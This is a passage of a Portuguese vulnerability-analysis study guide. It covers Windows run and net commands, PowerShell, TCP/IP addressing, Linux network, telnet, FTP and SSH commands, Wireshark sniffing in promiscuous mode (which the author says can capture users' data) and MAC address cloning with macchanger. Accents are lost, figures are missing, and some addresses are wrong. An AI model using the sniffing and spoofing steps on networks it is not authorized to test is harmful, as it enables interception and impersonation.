GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

COMPMGMT.MSC : Gerenciamento do computador

www.clubedohacker.com.br

151

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

COMPUTERDEFAULTS : Programas padro

www.clubedohacker.com.br

152

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

INTL.CPL : Opes regionais

www.clubedohacker.com.br

153

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

MAIN.CPL : Propriedades do mouse e dispositivos apontadores

www.clubedohacker.com.br

154

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

NETPLWIZ : Controle de usurios e acessos

www.clubedohacker.com.br

155

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

CREDWIZ : ferramenta de backup e de restaurao de senhas


dos usurios

www.clubedohacker.com.br

156

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

DESK.CPL : Configuraes de exibio

www.clubedohacker.com.br

157

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

DEVMGMT.MSC : Gerenciador de perifricos

www.clubedohacker.com.br

158

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
DXDIAG : Ferramenta de diagnstico DirectX

EVENTVWR.MSC : Visualizador de eventos

www.clubedohacker.com.br

159

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

FSMGMT.MSC : Pastas compartilhadas

www.clubedohacker.com.br

160

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

GPEDIT.MSC : Editor de estratgias e polticas de grupo

www.clubedohacker.com.br

161

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

ISCSICPL: Configurao do iniciador ICSI Microsoft

www.clubedohacker.com.br

162

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

www.clubedohacker.com.br

163

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
JOY.CPL : Controlador de jogos

LPKSETUP : instalao e remoo dos idiomas de exibio

www.clubedohacker.com.br

164

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

LUSRMGR.MSC : Editor dos usurios e grupos locais

www.clubedohacker.com.br

165

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

MDSCHED : Ferramenta de diagnsticos da memria

www.clubedohacker.com.br

166

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

MMC : Novo console vazio

MMSYS.CPL : Configuraes de som

www.clubedohacker.com.br

167

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

MOBSYNC: Centro de sincronizao

www.clubedohacker.com.br

168

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

MSCONFIG: Configurao do sistema

www.clubedohacker.com.br

169

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
NAPCLCFG.MSC : Configurao do cliente NAP

ODBCAD32 : Administrador de fonte de dados ODBC

www.clubedohacker.com.br

170

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

PERFMON.MSC : Monitor de confiabilidade e de desempenho


Windows

www.clubedohacker.com.br

171

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

POWERCFG.CPL : Gerenciador de modos de alimentao

www.clubedohacker.com.br

172

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
REGEDIT ou REGEDT32 : Editores de registro

REKEYWIZ : Gerenciador de certificados de criptografia de


arquivos

www.clubedohacker.com.br

173

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

RSOP.MSC : Estratgia resultante

www.clubedohacker.com.br

174

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

SECPOL.MSC: Configuraes de segurana local

www.clubedohacker.com.br

175

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

SERVICES.MSC : Gerenciador de servios

www.clubedohacker.com.br

176

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

SLUI : Assistente de ativao do Windows

www.clubedohacker.com.br

177

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

SYSDM.CPL : Propriedades do sistema

www.clubedohacker.com.br

178

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

SYSKEY : Proteo do banco de dados das contas Windows

www.clubedohacker.com.br

179

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

TABLETPC.CPL : Configuraes para o Tablet pc

www.clubedohacker.com.br

180

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

TASKSCHD.MSC: Agendamento de tarefas

www.clubedohacker.com.br

181

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

TIMEDATE.CPL : Configuraes da hora e da data

www.clubedohacker.com.br

182

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

TPM.MSC : Ferramenta de gesto do mdulo de plataforma


segura no computador local

www.clubedohacker.com.br

183

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

WMIMGMT.MSC: Gerncia de infraestrutura

WSCUI.CPL : Central de segurana Windows

www.clubedohacker.com.br

184

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

MRT : Utilitrio de remoo de malwares

www.clubedohacker.com.br

185

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

MSDT : Ferramenta de diagnsticos e suporte da Microsoft

www.clubedohacker.com.br

186

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

MSRA: Assistncia remota do Windows

www.clubedohacker.com.br

187

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

MSTSC: ferramenta de conexo da assistncia remota

www.clubedohacker.com.br

188

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

SIGVERIF : Ferramenta de verificao de assinaturas de


arquivos

www.clubedohacker.com.br

189

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
SNIPPINGTOOL : Ferramenta de captura de tela

CLEANMGR : Ferramenta de limpeza do disco

DISKMGMT.MSC : Gerenciador de discos

www.clubedohacker.com.br

190

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

DISKPART : Ferramenta de particionamento

www.clubedohacker.com.br

191

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
NCPA.CPL : Conexes da rede

FIREWALL.CPL : Firewall do Windows

www.clubedohacker.com.br

192

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

INETCPL.CPL : Propriedades da internet

www.clubedohacker.com.br

193

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Um comando que tambm super importante o


SHUTDOWN para desliga o sistema e SHUTDOWN -A para
interromper a desconexo.

www.clubedohacker.com.br

194

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
GETMAC: Visualizar o endewreo MAC da NIC

C:\> ipconfig /release: Limpar o cache DHCP


C:\> ipconfig /renew: Renovar o endereo IP da NIC em DHCP
C:\> net view: Exibir a lista de mquinas na rede
C:\> net share: Exibir Mquinas e os compartilhamentos
C:\> net use: Comando de administrao de usurios em shell
possvel tambm usar o comando "net use" para mapear
compartilhamentos de rede de outras mquinas via linha de comando.
Nesse caso, voc deve especificar a letra que ser atribuda ao
compartilhamento, seguida pelo "\\servidor\compartilhamento", como
em:
C:\> net use G: \\maquina\X: Mapeia compartilhamento X

www.clubedohacker.com.br

195

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
C:\> net use G: /delete: Desconectar um compartilhamento
Lembre-se que: Ao contrrio do Linux, o prompt do Windows no
case sensitive, portanto, tanto faz se voc digita "net use ou NET USE, e
isso valido para todos os comandos.
Windows PowerShell
O Windows PowerShell um shell de linha de comando e
linguagem de script, baseado em tarefas. Ele foi criado
preferencialmente para a administrao de sistemas. Por ser criado em
uma estrutura .NET, ele ajuda em muito os profissionais de TI a
controlar e automatizar a administrao do sistema operacional e os
programas que so executados em Windows.
Os comandos incorporados ao PowerShell so chamados de cmdlets e
permitem a gerncia dos computadores pela linha de comando.
O Windows PowerShel inclui recursos de:
Cmdlets para a execuo de tarefas comuns de administrao de
sistema, como gerenciamento de registro, servios, processos e
logs de eventos.
Uma linguagem de script baseada em tarefas e suporte para
scripts existentes e ferramentas de linha de comando.
Design consistente e, (Palavras da MIcrosoft), Como os cmdlets
e os repositrios de dados do sistema usam sintaxes comuns e
convenes de nomenclatura, os dados podem ser
compartilhados facilmente e a sada de um cmdlet pode ser usada
como a entrada para outro cmdlet, sem a necessidade de
reformatao ou manipulao.

www.clubedohacker.com.br

196

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Simplificada, a navegao baseada em comandos do sistema
operacional permite aos usurios navegar pelo registro e outros
repositrios de dados usando as mesmas tcnicas usadas para
navegar pelo sistema de arquivos.
Recursos de manipulao de objetos potentes. Objetos que
podem ser diretamente manipulados ou enviados para outras
ferramentas ou bancos de dados.
Interface extensvel. Provedores de software independentes e
desenvolvedores empresariais podem criar ferramentas
padronizadas e utilitrios para administrar seus softwares.
(Fonte: Site da Microsoft, acessado
em 24/05/2013)
Conceitos bsicos do Windows PowerShell
Segundo a prpria Microsoft, Windows PowerShell, deve usar uma
abordagem diferente para exibir as informaes, j que no possui
menus ou sistemas grficos para auxiliarem o usurio, assim como o
Explorer etc. Ser necessrio saber, ou aprender apenas os nomes dos
comandos antes de us-los.
O Windows PowerShell foi projetado para aproveitar o conhecimento
histrico dos usurios sobre as CLIs. Neste captulo, falaremos sobre
algumas ferramentas e conceitos bsicos que podem ser usados para um
rpido aprendizado do Windows PowerShell que Incluem:
O Get-Command
Comandos do Cmd.exe e do UNIX
Comandos Externos
Tab-Completion

www.clubedohacker.com.br

197

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Get-Help

get-command

Com o comando get-command voc ir descobrir todas os cmdlet e


escolher o ideal para a realizao de uma tarefa em especfico, voc
pode aprender mais sobre ele usando o cmdlet Get-Help.

www.clubedohacker.com.br

198

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

get-service

www.clubedohacker.com.br

199

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Com o comando acima, pode-se exibir o servios em execuo. Bem,
podemos afirmar que o Power shell veio para facilitar a vida de que
gosta de administrar via linha de comandos. por est fora do escopo
dessa obra, no nos aprofundaremos, mais o leitor dessa pode
acompanhar os artigos que sempre escrevo para meu site
www.clubedohacker.com.br onde apresento esse tema tambm em uma
rea exclusiva que estou criando apenas para os leitores dessa obra.
cadastre e solicite a liberao de acesso ao contedo exclusivo para
voc.
Apenas um lembrete: Os comandos binrios nativos do Windows
PowerShell, conhecidos como cmdlets (pronuncia-se command-lets),
podem ser estendidos por cmdlets criados por voc e adicionados ao
Windows PowerShell com o uso de snap-ins.
Os snap-ins do Windows PowerShell so compilados, assim como as
ferramentas binrias de qualquer outra interface e voc pode utiliz-los
para adicionar provedores do Windows PowerShell ao shell, assim como
novos cmdlets.
Comandos conhecidos da cmd.exe e Linux tambm so aceitos no
power shell por exemplo:
dir, mount, cat, cd, rm, rmdir sort, chdir, mv, cp, pwd, tee, del, ps, kill,
echo e muitos outros, participe de sua rea exclusiva no
clubedohacker.com.br para conhecer todo o potencial do PowerShell ou
no site da Microsoft.

www.clubedohacker.com.br

200

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
A PILHA TCP/IP
Precisamos entender um pouco sobre o modelo de comunicao
mais utilizado pela Internet e conseguentemente pelos computadores.
Tenho plena consiencia que esse nao um livro sobre redes e
protocolos. Mas como poderemos tratar de um tema to importante sem
incluir esse modelo, sabendo que nao haver outro meio de
comunicao entre os computadores a nao ser atraves de seus protocolos
de comunicao?
Pois bem, incluir esse tpico sobre introduo ao conjunto de
protocolos TCP/IP assim como o fiz introduzindo os dois sistemas
operacionais mais utilizados, Windows e Linux. Mas citarei apenas o
essencial para o entendimento de nossa proposta nesse livro e se voc j
estodou TCP/IP voc pular esse tpico tranquilamento.
O TCP/IP Transmission Control Protocol/Internet Protocol foi
criado pelo Departamento de Defesa dos Estados Unidos (DoD
Department of Defense) para assegurar e preservar a integridade dos
dados transmitidos e manter as comunicaes em caso de eventuais
guerras. Jamais poderimaos pensar que ele se tornaria o modelo de
referncia para o funcionamento da rede mundial de computadores.
Tambem no dava pra prever que um adolescente de 14 anos morando
do outro lado do planeta deteria conhecimentos suficientes para

www.clubedohacker.com.br

201

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
manipular essa pilha sem nunca ter passando em frente a uma
Universidade.
Pois bem, para que os computadores de uma rede possam trocar
informaes entre si necessrio que todos os computadores adotem as
mesmas regras para o envio e o recebimento das informaes.
Modelo de referncia TCP/IP: O Modelo TCP/IP dividido
em camadas num total de 4 de acordo com a tabela abaixo e em cada
camada residem os protocolos que por sua vez iram trabalhar atraves
das portas de comunicao do sistremas " system calls:

Diferena entre o protocolo TCP e UDP


O TCP um protocolo orientado a conexo porque ele pega um
bloco grande de informaes da camada superior "aplicao" e quebra
em vrias partes, dando origem ao que se chama de segmentos.

www.clubedohacker.com.br

202

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
J o UDP no coloca sequncia em seus segmentos e no se
importa com a ordem de chegada dos mesmos na maquina receptora.
Como isso o UDP s torna mais rpido que o TCP e muito til quando
se est utilizando VoIP etc.
Protocolo IP: Pertencente a camada Internet do modelo TCP/IP
o protocolo IP soberano em relao aos outros protocolos encontrados
nesta camada. Ou seja, os outros protocolos dessa camada serve para
dar suporte ao IP em algumas tarefas.
O Endereamento IP: O endereco IP um identificador
numrico de 32 bits que associado em cada mquina na rede IP. Um
endereo IP um endereo de software no um endereo de hardware.
Um endereo de hardware ou indereo MAC est contido na placa de
redes e usado para encontrar mquinas em uma rede local. J o
endereo IP permite que uma mquina em uma rede se comunique com
outra em outra rede ou na mesma rede.
Endereo de Broadcast Este endereo usado pelas
aplicaes e mquinas na rede para enviar informaes todos os
equipamentos ligda rede. Por exemplo: Se voc tem uma mquina
ligada em rede com o IP 192.168.0.10 todas as mquinas ligadas a
mesma rede ter um endereo unico de broadcast que ser

www.clubedohacker.com.br

203

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
192.168.0.255.

Atravs do comando arp -a voc pode visializar e confirmar o endereo


de broadcast, basta ver todos os endereamentos que terminam com 255
em todas as placas de rede.
Endereo de Multicast Envia informao para vrias
mquinas em redes diferentes. Os endereos de Multicast so usados
pelos protocolos de roteamento.
Endereo de Unicast Serve para enviar informao uma
nica mquina na rede.
O esquema de endereamento IP: Um endereo IP composto
de 32 bits de informao. Estes 32 bits so divididos em 4 setores
referidos como octeto ou bytes. O endereo IP de 32-bit um endereo

www.clubedohacker.com.br

204

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
estruturado hierrquicamente para que possa suportar um grande
nmero de endereos. Como assim?
O endereo IP de 32 bits, portanto, se caucularmos, 232 =
4.294.967.296. Mas mesmo assim necessrio que ele seja dividido por
classes. Se no fosse a estrutura de diviso hierarquica do
enderaamento IP todos os roteadores na internet teriam que guardar os
endereos de todas as mquinas na Internet.
Classes de endereos IP: As classes baseiam-se no tamanho das
redes e so divididas em endereos de rede e endereos de mquina.
Existem 5 tipos de classes que sero sero mostradas na tabela abaixo:

Para cada classe foi reservado uma certa quantidade de endereo os


intervalso de endreamento para cada classe so:

www.clubedohacker.com.br

205

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Endereos reservados: Tambm existem endereos que so


reservados, ou seja, no podem ser utilizados: So os endereos 0.0.0.0,
128.0.0.0, 191.255.0.0, 192.0.0.0, 223.255.255.0, 255.255.255.255 so
reservadas, e tambm o 127.0.0.1 que est reservado para loopback.
Endereos privados: Dentro das classes de endereos IP que
citamos aqui, existem ainda as classes de endereos Privados. Os
endereos privados so aqueles que no so roteveis pela Internet e so
exclusivamente usados nas redes privadas como a minha e a sua rede
local.

Servios de Rede - Configurando uma rede


Descobrindo o modelo da placa de rede: # lspci
Verificando se h o mdulo para esta interface:# ls
/lib/modules/`uname r`/kernel/drivers/net

www.clubedohacker.com.br

206

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Caso precise levantar o mdulo, digite o comando: # modprobe
[mdulo]
Para verificar se o mdulo est carregado, digite: # lsmod | grep
[mdulo]
Informaes de endereamento IP: # ifconfig
Eliminando as configuraes de rede: # ifconfig eth0 down
Exibindo a configurao: # ifconfig
Restaurando o servio de rede: # ifconfig eth0 up
Configurando o IP, Mscara e Broadcast: # ifconfig eth0 192.168.0.x
netmask 255.255.255.0 broadcast 192.168.0.255
Verificando se h conectividade: # ping 192.168.0.x
O ifconfig dinmico, para que as configuraes de endereamento IP
sejam carregadas durante o boot. O arquivo de configurao o
interfaces que pode ser editado com o comando :# vi
/etc/network/interfaces
Verificar daemon networking, para garantir boot do servio: # ls
/etc/rcS.d

www.clubedohacker.com.br

207

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Configurando o nome da mquina:# vi /etc/hostname
Configurando o nome da mquina e o nome de domnio: # vi /etc/hosts
Verificar domnio que est sendo utilizado: # hostname -f
Roteamento: # route
Configurando o roteamento: # route add default gw 192.168.0.1

Comandos do TELNET
O telnet: Permite o acesso remoto a uma mquina, fazendo a simulao
de um terminal virtual. Exemplo: telnet (depois de aberta a janela de
telnet deve-se especificar a mquina remota) ou telnet
nome.da.mquina.com.br
login: Permite o acesso de usurios devidamente credenciados a
mquina especificada em telnet. Exemplo: login adonel
Logout: Faz a desconexo entre o usurio e a mquina remota.
Exemplo: logout
Dir: Exibe o diretrio da mquina conectada via telnet Exemplo: dir
Pwd: Exibe o diretrio atual. Exemplo: pwd
cd: Muda de diretrio (cd = change directory) Exemplos: cd / (volta ao
diretrio raiz),
cd .. (volta apenas um diretrio), ou cd
nome_do_dir1/nome_do_dir2/... (avana do ponto em que est para o
diretrio especificado) ou cd /nome_do_dir1/nome_do_dir2/... (avana

www.clubedohacker.com.br

208

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
a partir do diretrio raiz para o diretrio especificado,
independentemente do diretrio em que estiver)
mkdir: Cria um novo diretrio (mkdir = make directory) Exemplo:
mkdir nome_do_diretrio
rmdir: Apaga um diretrio (rmdir = remove directory) Exemplo: rmdir
nome_dor_diretrio
cp: Copia um arquivo de um diretrio para outro (ou para o mesmo
diretrio), permitindo tambm, a mudana de nome na criao do novo
arquivo (cp = copy). Exemplo: cp caminho_origem/nome_do_arquivo
caminho_destino/nome_do_novo_arquivo
mv: Move um arquivo de um diretrio para outro (ou para o mesmo),
permitindo tambm, a mudana de nome na criao do novo arquivo
(mv = move).
Formato: mv caminho_origem/nome_do_arquivo
caminho_destino/nome_do_arquivo
rm: Apaga um arquivo de um diretrio especificado (rm = remove).
Exemplo: rm caminho_origem/nome_do_arquivo
caminho_destino/nome_do_arquivo
cls: Limpa a tela (cls = clear screen) Exemplo: cls
who: Exibe a relao de usurios on-line no sistema. Exemplo: who
passwd: Permite a mudana de senha do usurio (passwd = password =
senha). Exemplo: passwd [ENTER]
old password: (digite a senha que voc utilizou para entrar no sistema)
new password: (digite a nova senha)
retype password: (digite novamente a senha para conferncia)

www.clubedohacker.com.br

209

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Comandos do TELNET e FTP
FTP: Programa para transferncia de arquivos (ftp = file transfer
protocol)
Comandos do telnet aceitos pelo ftp: pwd, cd, mkdir, rmdir.
Comandos especficos do ftp:
open: para fazer a conexo a mquina remota. Exemplo: open
nome_da_mquina
Ou open xxx.xxx.xxx.xxx (onde xxx representa o endereo Ip da
mquina remota)
close: Faz a desconexo da mquina remota. Exemplo: close
quit: Abandona o modo ftp. Exemplo: quit
asc: Altera o formato de transferncia de arquivos para o modo ASCII.
Exemplo: asc
Bin: Altera o formato de transferncia de arquivos para o modo
BINRIO. Exemplo: bin
Dele: Apaga um arquivo do diretrio atual. Exemplo:dele
nome_do_arquivo
Put: Transfere um arquivo de um diretrio da mquina local para outro
diretrio na remota (put = colocar), possibilitando a mudana de nome
do arquivo transferido.
Exemplo: put caminho_origem/nome_do_arquivo
caminho_destino/nome_do_arquivo
get: Transfere um arquivo de um diretrio da mquina remota para
outro diretrio na local (get = pegar), possibilitando a mudana de nome
do arquivo transferido.

www.clubedohacker.com.br

210

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Exemplo:
get caminho_origem/nome_do_arquivo
caminho_destino/nome_do_novo_arquivo
mput: O mesmo que put, porm para vrios arquivos ao mesmo tempo.
Por exemplo, arquivos com a mesma extenso ou mesmo nome inicial.
Utilizado com o coringa * (mput = multiple put).
mget: O mesmo que get, porm para vrios arquivos. Por exemplo.
Seguir o mesmo procedimento do mput (mget = multiple get).
Comandos para conexo via SSH
Conexo no servidor SSH, atravs de uma das formas listadas abaixo:
#ssh <hostname>
#ssh <usuario>@<mquina>
#ssh -l <usurio> <ip da mquinar>
$ ssh adonel@192.168.0.12 - A partir da, voc pode acessar a mquina
remotamente a partir de outras mquinas Linux usando o comando
"ssh", seguido do login usurio (na mquina remota) e o endereo,
como o indicado acima.
Outras opes para trabalhar com SSH
Com o ssh voc pode executar comandos remotamente, onde o usurio
faz o login via ssh e depois que o resultado exibido, a conexo
fechada com o servidor.
Ex: #ssh -l tux 192.168.0.18 du -hs /usr - Com esse comando voc
estamos consultando a quantidade de espao ocupado em /usr do
servidor ssh.
Fazendo copias

www.clubedohacker.com.br

211

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Tambm possvel fazer cpias de arquivos ou diretrios remotamente
atravs do protocolo SSH, basta utilizar o o comando scp. Ex: # scp
<usuario>@<ip da mquina remota>:/<diretrio remoto/<arquivo>
<diretrio local> -> nesse exemplo estamos utilizando <> somente para
entendimento, mas no fazer parte do comando para fazer download de
arquivos do servidor SSH.
Fazendo upload
# scp <arquivo> <usuario>@<ip do servidor>:/<diretrio remoto ->
Copiando diretrios
# scp -r <usuario>@<ip do servidor>:/<diretrio remoto <diretrio
local>
Fazendo upload no diretrios no servidor SSH
# scp -r <diretrio local> <usuario>@<ip do servidor>:/<diretrio
remoto
Dois exemplos para fechar: Para fazer o download do diretrio /tmp do
servidor 192.168.0.12 para o seu diretrio /root local, utilizando o
usurio adonel login:
# scp -r adonel@192.168.0.12:/tmp /root
Exemplo: Para fazer upload do arquivo /tmp/teste20 que est na
mquina local para o servidor 192.168.0.12 no diretrio /home/adonel
no servidor, utilizando o usurio adonel login: # scp /tmp/teste20
adonel@192.168.0.100:/home/adonel
Um pouco mais sobre os pacotes em rede
Para aprender um pouco mais sobre a circulao dos pacotes na rede,
voc ir precisar do auxilio dos analisadores de protocolos. Lembre-se
que, se optar por utilizar um analisador de protocolos como o Wireshark

www.clubedohacker.com.br

212

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
por exemplo, alem de poder analisar os pacotes atravs da rede local,
tambm poder capturar dados de usurios, pois a maioria dessas
ferramentas funcionam tambm como sniffer. De qualquer forma voc
vai precisar deter alguns conhecimentos e o primeiro deles colocar sua
placa de rede em modo promiscuo, coisa que o Wireshark faz com
maestria, mais se deseja fazer isso manualmente tambm muito
simples.
Vamos mostrar as duas formas para que voc descida como ser melhor
em cada caso.

Analisador de protocolos Wireshark


Wireshark tranquilamente um dos melhores analisadores de protocolos
de rede que existe. uma excelente ferramenta para inspecionar redes,
desenvolver protocolos e tambm pode e deve ser utilizada para fins
educacionais ou mesmo para fins ilcitos.

www.clubedohacker.com.br

213

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

A primeira coisa que voc deve decidir se ele utilizar a captura com a
placa de rede em modo promiscuo ou normal. Se voc optar pelo modo
tradicional da placa de rede voc no ir analisar nada na rede, apenas
os pacotes de interesse da maquina local sero analisados. J se voc
optar pelo modo promiscuo, sua maquina vira uma espcie de gateway
na rede e todos os pacotes dentro do segmento sero analisados.

www.clubedohacker.com.br

214

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

A segunda a interface de rede que deve ser rastreada. clique em


Capture, depois em interfaces e escolha a placa de redes que desejar
monitorar o fluxo.

www.clubedohacker.com.br

215

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Escolha uma interface e clique no boto start que o rastreamento comea
e a janela principal do Wireshark passa a mostrar uma o movimento dos
pacotes na rede.

Os pacotes comeam a serem capturados imediatamente, sempre na


ordem de seus protocolos dentro da pilha TCP/IP.
O primeiro pacote foi gerado pela minha mquina para enviar em
broadcast que nada mais que uma mensagem do ARP que o
Protocolo de Resoluo de Endereo MAC para IP na rede local.
Nesse caso o browser pediu um domnio (no caso,
clubedohacker.com.br) que est fora da rede local, ou seja, minha
mquina precisa fazer uma conexo com um servidor de pginas
localizado numa outra rede e precisa de um autorizao que s pode ser
concedida pelo roteador da minha rede com o endereo IP
198.168.0.1.

www.clubedohacker.com.br

216

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Para poder falar com esta mquina, a placa Ethernet do meu computador
precisou do endereo MAC da placa Ethernet do roteador j que ela no
tem essa informao ela pergunta, colocando na rede um pacote de
broadcast.
O browser por sua vez, recebeu o nome de um domnio chamado de
clubedohacker.com.br, mas ele no sabe quem nem qual seu endereo
IP. Nesse caso a maquina local necessita utilizar algum servio de
traduo que esteja disponvel e transforme nomes de domnio em
endereos IP.
A entra em ao um especialista no assunto. Os servidores DNS.
Analisando um pacote voc ter trs painis distintos, o painel superior
contm a lista dos pacotes capturados e os outros dois contm as
informaes sobre o pacote que ir descrever o seguinte roteiro.
O protocolo TCP (Transmission Control Protocol - Protocolo de
Controle de Transmisso) acionado pelo aplicativo que, no nosso
exemplo, o browser. O browser fornece algumas informaes para que
o TCP possa montar seu pacote.
Este primeiro pacote repassado para o protocolo IP (Internet Protocol)
- responsvel pelo roteamento, isto. Nesse ponto j esta definida a
origem e o destino do pacote. O IP adiciona as informaes que so da
sua competncia e empacota os dados recebidos juntamente as
informaes que ele mesmo adicionou.
O IP ir transferir este novo pacote para a placa de rede que faz um novo
embrulho adicionando seu endereo MAC e o MAC do destino.
Clicando no ttulo Transmission Control Protocol no wireshark voc vai
observar a forma decimal do pacote.

www.clubedohacker.com.br

217

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Clique no ttulo Internet Protocol e observe no painel inferior que o


miolo do pacote destacada.
Bem, existem mais de uma dezena de opes para voc trabalhar com
wireshark.
Clonando o endereo MAC
Essa tarefa muito simples para quem utiliza Linux, basta seguir o
roteiro abaixo:
#macchanger --m (endereo mac que deseja e a interface de rede)

www.clubedohacker.com.br

218

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
exemplo: #macchanger --m SI:FU:SO:00:00:00 eth0 (Onde eth0 a
interface de rede que ser clonada) veja as imagens abaixo.

Aqui ns derrubamos a placa de rede e clonamos o endereo MAC. O


prximo passo ser levantar a placa e os servios.

